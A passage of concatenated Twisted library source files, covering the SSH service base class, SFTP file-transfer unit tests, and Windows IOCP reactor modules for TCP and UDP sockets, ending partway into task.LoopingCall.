Return a class to use as a service for the given transport.
@type transport: L{transport.SSHServerTransport}
@type service: C{stR}
@rtype: subclass of L{service.SSHService}
"""
if transport.isAuthorized or service == 'ssh-userauth':
return self.services[service]
```
#### File: conch/ssh/service.py
```python
from twisted.python import log
class SSHService(log.Logger):
name = None # this is the ssh name for the service
protocolMessages = {} # these map #'s -> protocol names
transport = None # gets set later
def serviceStarted(self):
"""
called when the service is active on the transport.
"""
def serviceStopped(self):
"""
called when the service is stopped, either by the connection ending
or by another service being started
"""
def logPrefix(self):
return "SSHService %s on %s" % (self.name, self.transport.transport.logPrefix())
def packetReceived(self, messageType, packet):
"""
called when we receieve a packet on the transport
"""
#print self.protocolMessages
f = getattr(self,'ssh_%s' % self.protocolMessages[messageType][4:], None)
if f:
f(packet)
else:
log.msg("couldn't handle", messageType)
log.msg(repr(packet[1:]))
self.transport.sendUnimplemented()
```
#### File: conch/test/test_filetransfer.py
```python
import os
import sys
from twisted.trial import unittest
try:
from twisted.conch import unix
except ImportError:
unix = None
try:
del sys.modules['twisted.conch.unix'] # remove the bad import
except KeyError:
# In Python 2.4, the bad import has already been cleaned up for us.
# Hooray.
pass
from twisted.conch import avatar
from twisted.conch.ssh import filetransfer, session
from twisted.internet import defer, reactor
from twisted.protocols import loopback
from twisted.python import components, log
class FileTransferTestAvatar(avatar.ConchUser):
def __init__(self, homeDir):
avatar.ConchUser.__init__(self)
self.channelLookup['session'] = session.SSHSession
self.subsystemLookup['sftp'] = filetransfer.FileTransferServer
self.homeDir = homeDir
def _runAsUser(self, f, *args, **kw):
try:
f = iter(f)
except TypeError:
f = [(f, args, kw)]
for i in f:
func = i[0]
args = len(i)>1 and i[1] or ()
kw = len(i)>2 and i[2] or {}
r = func(*args, **kw)
return r
def getHomeDir(self):
return os.path.join(os.getcwd(), self.homeDir)
class ConchSessionForTestAvatar:
def __init__(self, avatar):
self.avatar = avatar
if unix:
if not hasattr(unix, 'SFTPServerForUnixConchUser'):
# unix should either be a fully working module, or None. I'm not sure
# how this happens, but on win32 it does. Try to cope. --spiv.
import warnings
warnings.warn(("twisted.conch.unix imported %r, "
"but doesn't define SFTPServerForUnixConchUser'")
% (unix,))
unix = None
else:
class FileTransferForTestAvatar(unix.SFTPServerForUnixConchUser):
def gotVersion(self, version, otherExt):
return {'conchTest' : 'ext data'}
def extendedRequest(self, extName, extData):
if extName == 'testExtendedRequest':
return 'bar'
raise NotImplementedError
components.registerAdapter(FileTransferForTestAvatar,
FileTransferTestAvatar,
filetransfer.ISFTPServer)
class SFTPTestBase(unittest.TestCase):
def setUp(self):
self.testDir = self.mktemp()
# Give the testDir another level so we can safely "cd .." from it in
# tests.
self.testDir = os.path.join(self.testDir, 'extra')
os.makedirs(os.path.join(self.testDir, 'testDirectory'))
f = file(os.path.join(self.testDir, 'testfile1'),'w')
f.write('a'*10+'b'*10)
f.write(file('/dev/urandom').read(1024*64)) # random data
os.chmod(os.path.join(self.testDir, 'testfile1'), 0644)
file(os.path.join(self.testDir, 'testRemoveFile'), 'w').write('a')
file(os.path.join(self.testDir, 'testRenameFile'), 'w').write('a')
file(os.path.join(self.testDir, '.testHiddenFile'), 'w').write('a')
class TestOurServerOurClient(SFTPTestBase):
if not unix:
skip = "can't run on non-posix computers"
def setUp(self):
SFTPTestBase.setUp(self)
self.avatar = FileTransferTestAvatar(self.testDir)
self.server = filetransfer.FileTransferServer(avatar=self.avatar)
clientTransport = loopback.LoopbackRelay(self.server)
self.client = filetransfer.FileTransferClient()
self._serverVersion = None
self._extData = None
def _(serverVersion, extData):
self._serverVersion = serverVersion
self._extData = extData
self.client.gotServerVersion = _
serverTransport = loopback.LoopbackRelay(self.client)
self.client.makeConnection(clientTransport)
self.server.makeConnection(serverTransport)
self.clientTransport = clientTransport
self.serverTransport = serverTransport
self._emptyBuffers()
def _emptyBuffers(self):
while self.serverTransport.buffer or self.clientTransport.buffer:
self.serverTransport.clearBuffer()
self.clientTransport.clearBuffer()
def _delayedEmptyBuffers(self):
reactor.callLater(0.1, self._emptyBuffers)
def testServerVersion(self):
self.failUnlessEqual(self._serverVersion, 3)
self.failUnlessEqual(self._extData, {'conchTest' : 'ext data'})
def testOpenFileIO(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _fileOpened(openFile):
self.failUnlessEqual(openFile, filetransfer.ISFTPFile(openFile))
d = _readChunk(openFile)
d.addCallback(_writeChunk, openFile)
return d
def _readChunk(openFile):
d = openFile.readChunk(0, 20)
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'a'*10 + 'b'*10)
return d
def _writeChunk(_, openFile):
d = openFile.writeChunk(20, 'c'*10)
self._emptyBuffers()
d.addCallback(_readChunk2, openFile)
return d
def _readChunk2(_, openFile):
d = openFile.readChunk(0, 30)
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'a'*10 + 'b'*10 + 'c'*10)
return d
d.addCallback(_fileOpened)
return d
def testClosedFileGetAttrs(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(_, openFile):
d = openFile.getAttrs()
self._emptyBuffers()
return d
def _err(f):
log.flushErrors()
return f
def _close(openFile):
d = openFile.close()
self._emptyBuffers()
d.addCallback(_getAttrs, openFile)
d.addErrback(_err)
return self.assertFailure(d, filetransfer.SFTPError)
d.addCallback(_close)
return d
def testOpenFileAttributes(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(openFile):
d = openFile.getAttrs()
self._emptyBuffers()
d.addCallback(_getAttrs2)
return d
def _getAttrs2(attrs1):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, attrs1)
return d
return d.addCallback(_getAttrs)
def testOpenFileSetAttrs(self):
# XXX test setAttrs
# Ok, how about this for a start? It caught a bug :) -- spiv.
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(openFile):
d = openFile.getAttrs()
self._emptyBuffers()
d.addCallback(_setAttrs)
return d
def _setAttrs(attrs):
attrs['atime'] = 0
d = self.client.setAttrs('testfile1', attrs)
self._emptyBuffers()
d.addCallback(_getAttrs2)
d.addCallback(self.failUnlessEqual, attrs)
return d
def _getAttrs2(_):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
return d
d.addCallback(_getAttrs)
return d
def testRemoveFile(self):
d = self.client.getAttrs("testRemoveFile")
self._emptyBuffers()
def _removeFile(ignored):
d = self.client.removeFile("testRemoveFile")
self._emptyBuffers()
return d
d.addCallback(_removeFile)
d.addCallback(_removeFile)
return self.assertFailure(d, filetransfer.SFTPError)
def testRenameFile(self):
d = self.client.getAttrs("testRenameFile")
self._emptyBuffers()
def _rename(attrs):
d = self.client.renameFile("testRenameFile", "testRenamedFile")
self._emptyBuffers()
d.addCallback(_testRenamed, attrs)
return d
def _testRenamed(_, attrs):
d = self.client.getAttrs("testRenamedFile")
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, attrs)
return d.addCallback(_rename)
def testDirectoryBad(self):
d = self.client.getAttrs("testMakeDirectory")
self._emptyBuffers()
return self.assertFailure(d, filetransfer.SFTPError)
def testDirectoryCreation(self):
d = self.client.makeDirectory("testMakeDirectory", {})
self._emptyBuffers()
def _getAttrs(_):
d = self.client.getAttrs("testMakeDirectory")
self._emptyBuffers()
return d
# XXX not until version 4/5
# self.failUnlessEqual(filetransfer.FILEXFER_TYPE_DIRECTORY&attrs['type'],
# filetransfer.FILEXFER_TYPE_DIRECTORY)
def _removeDirectory(_):
d = self.client.removeDirectory("testMakeDirectory")
self._emptyBuffers()
return d
d.addCallback(_getAttrs)
d.addCallback(_removeDirectory)
d.addCallback(_getAttrs)
return self.assertFailure(d, filetransfer.SFTPError)
def testOpenDirectory(self):
d = self.client.openDirectory('')
self._emptyBuffers()
files = []
def _getFiles(openDir):
def append(f):
files.append(f)
return openDir
d = defer.maybeDeferred(openDir.next)
self._emptyBuffers()
d.addCallback(append)
d.addCallback(_getFiles)
d.addErrback(_close, openDir)
return d
def _checkFiles(ignored):
fs = list(zip(*files)[0])
fs.sort()
self.failUnlessEqual(fs,
['.testHiddenFile', 'testDirectory',
'testRemoveFile', 'testRenameFile',
'testfile1'])
def _close(_, openDir):
d = openDir.close()
self._emptyBuffers()
return d
d.addCallback(_getFiles)
d.addCallback(_checkFiles)
return d
def testLinkDoesntExist(self):
d = self.client.getAttrs('testLink')
self._emptyBuffers()
return self.assertFailure(d, filetransfer.SFTPError)
def testLinkSharesAttrs(self):
d = self.client.makeLink('testLink', 'testfile1')
self._emptyBuffers()
def _getFirstAttrs(_):
d = self.client.getAttrs('testLink', 1)
self._emptyBuffers()
return d
def _getSecondAttrs(firstAttrs):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
d.addCallback(self.assertEqual, firstAttrs)
return d
d.addCallback(_getFirstAttrs)
return d.addCallback(_getSecondAttrs)
def testLinkPath(self):
d = self.client.makeLink('testLink', 'testfile1')
self._emptyBuffers()
def _readLink(_):
d = self.client.readLink('testLink')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual,
os.path.join(os.getcwd(), self.testDir, 'testfile1'))
return d
def _realPath(_):
d = self.client.realPath('testLink')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual,
os.path.join(os.getcwd(), self.testDir, 'testfile1'))
return d
d.addCallback(_readLink)
d.addCallback(_realPath)
return d
def testExtendedRequest(self):
d = self.client.extendedRequest('testExtendedRequest', 'foo')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'bar')
d.addCallback(self._cbTestExtendedRequest)
return d
def _cbTestExtendedRequest(self, ignored):
d = self.client.extendedRequest('testBadRequest', '')
self._emptyBuffers()
return self.assertFailure(d, NotImplementedError)
```
#### File: internet/iocpreactor/client.py
```python
import socket
from twisted.persisted import styles
from twisted.internet.base import BaseConnector
from twisted.internet import defer, interfaces, error
from twisted.python import failure
from abstract import ConnectedSocket
from ops import ConnectExOp
from util import StateEventMachineType
from zope.interface import implements
class ClientSocket(ConnectedSocket):
def __init__(self, sock, protocol, sf):
ConnectedSocket.__init__(self, sock, protocol, sf)
self.repstr = '<%s to %s at %x>' % (self.__class__, self.sf.addr, id(self))
self.logstr = protocol.__class__.__name__+",client"
self.startReading()
class _SubConnector:
state = "connecting"
socket = None
def __init__(self, sf):
self.sf = sf
def startConnecting(self):
d = defer.maybeDeferred(self.sf.resolveAddress)
d.addCallback(self._cbResolveDone)
d.addErrback(self._ebResolveErr)
def _cbResolveDone(self, addr):
if self.state == "dead":
return
try:
skt = socket.socket(*self.sf.sockinfo)
except socket.error, se:
raise error.ConnectBindError(se[0], se[1])
try:
if self.sf.bindAddress is None:
self.sf.bindAddress = ("", 0) # necessary for ConnectEx
skt.bind(self.sf.bindAddress)
except socket.error, se:
raise error.ConnectBindError(se[0], se[1])
self.socket = skt
op = ConnectExOp(self)
op.initiateOp(self.socket, addr)
def _ebResolveErr(self, fail):
if self.state == "dead":
return
self.sf.connectionFailed(fail)
def connectDone(self):
if self.state == "dead":
return
self.sf.connectionSuccess()
def connectErr(self, err):
if self.state == "dead":
return
self.sf.connectionFailed(err)
class SocketConnector(styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IConnector)
transport_class = ClientSocket
events = ["stopConnecting", "disconnect", "connect"]
sockinfo = None
factoryStarted = False
timeoutID = None
def __init__(self, addr, factory, timeout, bindAddress):
from twisted.internet import reactor
self.state = "disconnected"
self.addr = addr
self.factory = factory
self.timeout = timeout
self.bindAddress = bindAddress
self.reactor = reactor
self.prepareAddress()
def handle_connecting_stopConnecting(self):
self.connectionFailed(failure.Failure(error.UserError()))
def handle_disconnected_stopConnecting(self):
raise error.NotConnectingError
handle_connected_stopConnecting = handle_disconnected_stopConnecting
handle_connecting_disconnect = handle_connecting_stopConnecting
def handle_connected_disconnect(self):
self.transport.loseConnection()
def handle_disconnected_disconnect(self):
pass
def handle_connecting_connect(self):
raise RuntimeError, "can't connect in this state"
handle_connected_connect = handle_connecting_connect
def handle_disconnected_connect(self):
self.state = "connecting"
if not self.factoryStarted:
self.factory.doStart()
self.factoryStarted = True
if self.timeout is not None:
self.timeoutID = self.reactor.callLater(self.timeout, self.connectionFailed, failure.Failure(error.TimeoutError()))
self.sub = _SubConnector(self)
self.sub.startConnecting()
self.factory.startedConnecting(self)
def prepareAddress(self):
raise NotImplementedError
def resolveAddress(self):
raise NotImplementedError
def connectionLost(self, reason):
self.state = "disconnected"
self.factory.clientConnectionLost(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def connectionFailed(self, reason):
if self.sub.socket:
self.sub.socket.close()
self.sub.state = "dead"
del self.sub
self.state = "disconnected"
self.cancelTimeout()
self.factory.clientConnectionFailed(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def cancelTimeout(self):
if self.timeoutID:
try:
self.timeoutID.cancel()
except ValueError:
pass
del self.timeoutID
def connectionSuccess(self):
socket = self.sub.socket
self.sub.state = "dead"
del self.sub
self.state = "connected"
self.cancelTimeout()
p = self.factory.buildProtocol(self.buildAddress(socket.getpeername()))
self.transport = self.transport_class(socket, p, self)
p.makeConnection(self.transport)
```
#### File: internet/iocpreactor/proactor.py
```python
from twisted.internet import defer, base, main
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorMulticast, IReactorArbitrary, IReactorProcess
from twisted.python import threadable, log, reflect
from zope.interface import implements, implementsOnly
import tcp, udp, process, process_waiter
from _iocp import iocpcore
class Proactor(iocpcore, base.ReactorBase, log.Logger):
# IReactorSSL (or leave it until exarkun finishes TLS)
# IReactorCore (cleanup)
implementsOnly(IReactorTCP, IReactorUDP, IReactorMulticast, IReactorArbitrary, IReactorProcess)
handles = None
iocp = None
def __init__(self):
iocpcore.__init__(self)
base.ReactorBase.__init__(self)
self.logstr = reflect.qual(self.__class__)
self.processWaiter = process_waiter.ProcessWaiter(self)
# self.completables = {}
def startRunning(self):
threadable.registerAsIOThread()
self.fireSystemEvent('startup')
self.running = 1
def run(self):
self.startRunning()
self.mainLoop()
def mainLoop(self):
while self.running:
try:
while self.running:
# Advance simulation time in delayed event
# processors.
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self.doIteration(t)
except KeyboardInterrupt:
self.stop()
except:
log.msg("Unexpected error in main loop.")
log.deferr()
else:
log.msg('Main loop terminated.')
def removeAll(self):
return []
def installWaker(self):
pass
def wakeUp(self):
def ignore(ret, bytes, arg):
pass
if not threadable.isInIOThread():
self.issuePostQueuedCompletionStatus(ignore, None)
def listenTCP(self, port, factory, backlog=50, interface=''):
p = tcp.Port((interface, port), factory, backlog)
p.startListening()
return p
def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
c = tcp.Connector((host, port), factory, timeout, bindAddress)
c.connect()
return c
def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
p = udp.Port((interface, port), protocol, maxPacketSize)
p.startListening()
return p
def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
p = udp.MulticastPort((interface, port), protocol, maxPacketSize)
p.startListening()
return p
def connectUDPblah(self, remotehost, remoteport, protocol, localport=0,
interface='', maxPacketSize=8192):
p = udp.ConnectedPort((remotehost, remoteport), (interface, localport), protocol, maxPacketSize)
p.startListening()
return p
def listenWith(self, portType, *args, **kw):
p = portType(*args, **kw)
p.startListening()
return p
def connectWith(self, connectorType, *args, **kw):
c = connectorType(*args, **kw)
c.connect()
return c
def spawnProcess(self, processProtocol, executable, args=(), env={}, path=None, uid=None, gid=None, usePTY=0, childFDs=None):
"""Spawn a process."""
if uid is not None:
raise ValueError("Setting UID is unsupported on this platform.")
if gid is not None:
raise ValueError("Setting GID is unsupported on this platform.")
if usePTY:
raise ValueError("PTYs are unsupported on this platform.")
if childFDs is not None:
raise ValueError(
"Custom child file descriptor mappings are unsupported on "
"this platform.")
return process.Process(self, processProtocol, executable, args, env, path)
def logPrefix(self):
return self.logstr
def install():
from twisted.python import threadable
p = Proactor()
threadable.init()
main.installReactor(p)
```
#### File: internet/iocpreactor/server.py
```python
from sets import Set
import socket
from twisted.internet import interfaces, address, error
from twisted.persisted import styles
from twisted.python import log, reflect
from ops import AcceptExOp
from abstract import ConnectedSocket
from util import StateEventMachineType
from zope.interface import implements
class ServerSocket(ConnectedSocket):
def __init__(self, sock, protocol, sf, sessionno):
ConnectedSocket.__init__(self, sock, protocol, sf)
self.logstr = "%s,%s,%s" % (self.protocol.__class__.__name__, sessionno, self.getPeerHost())
self.repstr = "<%s #%s on %s>" % (self.protocol.__class__.__name__, sessionno, self.getPeerPort())
self.startReading()
class ListeningPort(log.Logger, styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IListeningPort)
events = ["startListening", "stopListening", "loseConnection", "acceptDone", "acceptErr"]
sockinfo = None
transport_class = ServerSocket
sessionno = 0
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
def __init__(self, addr, factory, backlog):
self.state = "disconnected"
self.addr = addr
self.factory = factory
self.backlog = backlog
self.accept_op = AcceptExOp(self)
def __repr__(self):
if self._realPortNumber is not None:
return "<%s of %s on %s>" % (self.__class__, self.factory.__class__,
self._realPortNumber)
else:
return "<%s of %s (not listening)>" % (self.__class__, self.factory.__class__)
def handle_disconnected_startListening(self):
log.msg("%s starting on %s" % (self.factory.__class__, self.getOwnPort()))
try:
skt = socket.socket(*self.sockinfo)
skt.bind(self.addr)
except socket.error, le:
raise error.CannotListenError, (None, None, le)
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s" % (self.factory.__class__, self._realPortNumber))
self.factory.doStart()
skt.listen(self.backlog)
self.socket = skt
self.state = "listening"
self.startAccepting()
def startAccepting(self):
self.accept_op.initiateOp(self.socket.fileno())
def handle_listening_acceptDone(self, sock, addr):
protocol = self.factory.buildProtocol(self.buildAddress(addr))
if protocol is None:
sock.close()
else:
s = self.sessionno
self.sessionno = s+1
transport = self.transport_class(sock, protocol, self, s)
protocol.makeConnection(transport)
if self.state == "listening":
self.startAccepting()
def handle_disconnected_acceptDone(self, sock, addr):
sock.close()
def handle_listening_acceptErr(self, ret, bytes):
# print "ono acceptErr", ret, bytes
self.stopListening()
def handle_disconnected_acceptErr(self, ret, bytes):
# print "ono acceptErr", ret, bytes
pass
def handle_listening_stopListening(self):
self.state = "disconnected"
self.socket.close()
log.msg('(Port %s Closed)' % self._realPortNumber)
self._realPortNumber = None
self.factory.doStop()
handle_listening_loseConnection = handle_listening_stopListening
def handle_disconnected_stopListening(self):
raise error.NotListeningError
def logPrefix(self):
"""Returns the name of my class, to prefix log entries with.
"""
return reflect.qual(self.factory.__class__)
def connectionLost(self, reason):
pass
# stupid workaround for test_tcp.LoopbackTestCase.testClosePortInProtocolFactory
disconnected = property(lambda self: self.state == "disconnected")
connected = property(lambda self: self.state == "listening")
```
#### File: internet/iocpreactor/tcp.py
```python
import types, socket, operator
from twisted.internet.abstract import isIPAddress # would rather not import "abstract"
from twisted.internet import defer, interfaces, address, error
from twisted.python import log
import server, client
import iocpdebug
from zope.interface import implements
class TcpMixin:
def getTcpNoDelay(self):
return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
def setTcpNoDelay(self, enabled):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)
def getTcpKeepAlive(self):
return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE))
def setTcpKeepAlive(self, enabled):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
def getHost(self):
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def getPeer(self):
return address.IPv4Address('TCP', *(self.socket.getpeername() + ('INET',)))
def getPeerHost(self):
return self.socket.getpeername()[0]
def getPeerPort(self):
return self.socket.getpeername()[1]
class ServerSocket(server.ListeningPort.transport_class, TcpMixin):
implements(interfaces.ITCPTransport)
class Port(server.ListeningPort):
sockinfo = (socket.AF_INET, socket.SOCK_STREAM, 0)
transport_class = ServerSocket
def __init__(self, (host, port), factory, backlog):
if iocpdebug.debug:
print "listening on (%s, %s)" % (host, port)
if isinstance(port, types.StringTypes):
try:
port = socket.getservbyname(port, 'tcp')
except socket.error, e:
raise error.ServiceNameUnknownError(string=str(e))
server.ListeningPort.__init__(self, (host, port), factory, backlog)
def getOwnPort(self):
return self.addr[1]
def getHost(self):
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def buildAddress(self, addr):
return address._ServerFactoryIPv4Address('TCP', addr[0], addr[1], 'INET')
class ClientSocket(client.SocketConnector.transport_class, TcpMixin):
implements(interfaces.ITCPTransport)
class Connector(client.SocketConnector):
sockinfo = (socket.AF_INET, socket.SOCK_STREAM, 0)
transport_class = ClientSocket
def _filterRealAddress(self, host):
return (host, self.addr[1])
def prepareAddress(self):
host, port = self.addr
if iocpdebug.debug:
print "connecting to (%s, %s)" % (host, port)
if isinstance(port, types.StringTypes):
try:
port = socket.getservbyname(port, 'tcp')
except socket.error, e:
raise error.ServiceNameUnknownError(string=str(e))
self.addr= (host, port)
def resolveAddress(self):
host, port = self.addr
if isIPAddress(host):
return self.addr
else:
from twisted.internet import reactor
return reactor.resolve(host).addCallback(self._filterRealAddress)
def getDestination(self):
return address.IPv4Address('TCP', self.addr[0], self.addr[1], 'INET')
def buildAddress(self, addr):
return address.IPv4Address('TCP', addr[0], addr[1], 'INET')
```
#### File: internet/iocpreactor/udp.py
```python
import socket
import struct
import operator
from twisted.internet import interfaces, defer, error, protocol, address
from twisted.internet.udp import MulticastMixin
from twisted.internet.abstract import isIPAddress
from twisted.persisted import styles
from twisted.python import log, failure, reflect
from ops import ReadFileOp, WriteFileOp, WSARecvFromOp, WSASendToOp
from util import StateEventMachineType
from zope.interface import implements
ERROR_PORT_UNREACHABLE = 1234
class Port(log.Logger, styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IUDPTransport)
events = ["startListening", "stopListening", "write", "readDone", "readErr", "writeDone", "writeErr", "connect"]
sockinfo = (socket.AF_INET, socket.SOCK_DGRAM, 0)
read_op_class = WSARecvFromOp
write_op_class = WSASendToOp
reading = False
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
disconnected = property(lambda self: self.state == "disconnected")
def __init__(self, bindAddress, proto, maxPacketSize=8192):
assert isinstance(proto, protocol.DatagramProtocol)
self.state = "disconnected"
from twisted.internet import reactor
self.bindAddress = bindAddress
self._connectedAddr = None
self.protocol = proto
self.maxPacketSize = maxPacketSize
self.logstr = reflect.qual(self.protocol.__class__) + " (UDP)"
self.read_op = self.read_op_class(self)
self.readbuf = reactor.AllocateReadBuffer(maxPacketSize)
self.reactor = reactor
def __repr__(self):
if self._realPortNumber is not None:
return "<%s on %s>" % (self.protocol.__class__, self._realPortNumber)
else:
return "<%s not connected>" % (self.protocol.__class__,)
def handle_listening_connect(self, host, port):
if not isIPAddress(host):
raise ValueError, "please pass only IP addresses, not domain names"
self.state = "connecting"
return defer.maybeDeferred(self._connectDone, host, port)
def handle_connecting_connect(self, host, port):
raise RuntimeError, "already connected, reconnecting is not currently supported (talk to itamar if you want this)"
handle_connected_connect = handle_connecting_connect
def _connectDone(self, host, port):
self._connectedAddr = (host, port)
self.state = "connected"
self.socket.connect((host, port))
return self._connectedAddr
def handle_disconnected_startListening(self):
self._bindSocket()
host, port = self.bindAddress
if isIPAddress(host):
return defer.maybeDeferred(self._connectSocket, host)
else:
d = self.reactor.resolve(host)
d.addCallback(self._connectSocket)
return d
def _bindSocket(self):
try:
skt = socket.socket(*self.sockinfo)
skt.bind(self.bindAddress)
# print "bound %s to %s" % (skt.fileno(), self.bindAddress)
except socket.error, le:
raise error.CannotListenError, (None, None, le)
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s"%(self.protocol.__class__, self._realPortNumber))
self.socket = skt
def _connectSocket(self, host):
self.bindAddress = (host, self.bindAddress[1])
self.protocol.makeConnection(self)
self.startReading()
self.state = "listening"
def startReading(self):
self.reading = True
try:
self.read_op.initiateOp(self.socket.fileno(), self.readbuf)
except WindowsError, we:
log.msg("initiating read failed with args %s" % (we,))
def stopReading(self):
self.reading = False
def handle_listening_readDone(self, bytes, addr = None):
if addr:
try:
self.protocol.datagramReceived(self.readbuf[:bytes], addr)
except:
log.err()
else:
self.protocol.datagramReceived(self.readbuf[:bytes])
if self.reading:
self.startReading()
handle_connecting_readDone = handle_listening_readDone
handle_connected_readDone = handle_listening_readDone
def handle_listening_readErr(self, ret, bytes):
log.msg("read failed with err %s" % (ret,))
# TODO: use Failures or something
if ret == ERROR_PORT_UNREACHABLE:
self.protocol.connectionRefused()
if self.reading:
self.startReading()
handle_connecting_readErr = handle_listening_readErr
handle_connected_readErr = handle_listening_readErr
def handle_disconnected_readErr(self, ret, bytes):
pass # no kicking the dead horse
def handle_disconnected_readDone(self, bytes, addr = None):
pass # no kicking the dead horse
def handle_listening_write(self, data, addr):
self.performWrite(data, addr)
def handle_connected_write(self, data, addr = None):
assert addr in (None, self._connectedAddr)
self.performWrite(data, addr)
def performWrite(self, data, addr = None):
# print "performing write on", data, addr
self.writing = True
try:
write_op = self.write_op_class(self)
if not addr:
addr = self._connectedAddr
write_op.initiateOp(self.socket.fileno(), data, addr)
# print "initiating write_op to", addr
except WindowsError, we:
log.msg("initiating write failed with args %s" % (we,))
def handle_listening_writeDone(self, bytes):
log.msg("write success with bytes %s" % (bytes,))
# self.callBufferHandlers(event = "buffer empty")
handle_connecting_writeDone = handle_listening_writeDone
handle_connected_writeDone = handle_listening_writeDone
def handle_listening_writeErr(self, ret, bytes):
log.msg("write failed with err %s" % (ret,))
if ret == ERROR_PORT_UNREACHABLE:
self.protocol.connectionRefused()
handle_connecting_writeErr = handle_listening_writeErr
handle_connected_writeErr = handle_listening_writeErr
def handle_disconnected_writeErr(self, ret, bytes):
pass # no kicking the dead horse
def handle_disconnected_writeDone(self, bytes):
pass # no kicking the dead horse
def writeSequence(self, seq, addr):
self.write("".join(seq), addr)
def handle_listening_stopListening(self):
self.stopReading()
self.connectionLost()
handle_connecting_stopListening = handle_listening_stopListening
handle_connected_stopListening = handle_listening_stopListening
def connectionLost(self, reason=None):
log.msg('(Port %s Closed)' % self._realPortNumber)
self._realPortNumber = None
self.protocol.doStop()
self.socket.close()
del self.socket
self.state = "disconnected"
def logPrefix(self):
return self.logstr
def getHost(self):
return address.IPv4Address('UDP', *(self.socket.getsockname() + ('INET_UDP',)))
class MulticastPort(MulticastMixin, Port):
"""UDP Port that supports multicasting."""
implements(interfaces.IMulticastTransport)
def __init__(self, bindAddress, proto, maxPacketSize=8192, listenMultiple=False):
Port.__init__(self, bindAddress, proto, maxPacketSize)
self.listenMultiple = listenMultiple
def createInternetSocket(self):
skt = Port.createInternetSocket(self)
if self.listenMultiple:
skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
return skt
```
#### File: internet/iocpreactor/util.py
```python
from twisted.python import log
class StateEventMachineType(type):
def makeHandleGetter(klass, name):
def helpful(self):
# log.msg("looking up %s in state %s" % (name, self.state))
return getattr(self, "handle_%s_%s" % (self.state, name))
return helpful
makeHandleGetter = classmethod(makeHandleGetter)
def makeMethodProxy(klass, name):
def helpful(self, *a, **kw):
return getattr(self, "handle_%s_%s" % (self.state, name))(*a, **kw)
return helpful
makeMethodProxy = classmethod(makeMethodProxy)
# def __new__(klass, name, bases, attrs):
# for e in name.events:
# attrs[e] = property(klass.makeHandleGetter(e))
# return type.__new__(klass, name, bases, attrs)
def __init__(klass, name, bases, attrs):
type.__init__(klass, name, bases, attrs)
# print "making a class", klass, "with events", klass.events
for e in klass.events:
# setattr(klass, e, property(klass.makeHandleGetter(e)))
setattr(klass, e, klass.makeMethodProxy(e))
```
#### File: twisted/internet/pyuisupport.py
```python
import pyui
def _guiUpdate(reactor, delay):
pyui.draw()
if pyui.update() == 0:
pyui.quit()
reactor.stop()
else:
reactor.callLater(delay, _guiUpdate, reactor, delay)
def install(ms=10, reactor=None, args=(), kw={}):
"""
Schedule PyUI's display to be updated approximately every C{ms}
milliseconds, and initialize PyUI with the specified arguments.
"""
d = pyui.init(*args, **kw)
if reactor is None:
from twisted.internet import reactor
_guiUpdate(reactor, ms / 1000.0)
return d
__all__ = ["install"]
```
#### File: twisted/internet/task.py
```python
__metaclass__ = type
import time
from twisted.python.runtime import seconds
from twisted.python import reflect
from twisted.internet import base, defer
class LoopingCall:
"""Call a function repeatedly.
@ivar f: The function to call.
@ivar a: A tuple of arguments to pass the function.
@ivar kw: A dictionary of keyword arguments to pass to the function.
If C{f} returns a deferred, rescheduling will not take place until the
deferred has fired. The result value is ignored.
"""
call = None
running = False
deferred = None
interval = None
count = None
starttime = None
def _callLater(self, delay):
from twisted.internet import reactor
return reactor.callLater(delay, self)
_seconds = staticmethod(seconds)
def __init__(self, f, *a, **kw):
self.f = f
self.a = a
self.kw = kw
def start(self, interval, now=True):
"""Start running function every interval seconds.
@param interval: The number of seconds between calls. May be
less than one. Precision will depend on the underlying
platform, the available hardware, and the load on the system.
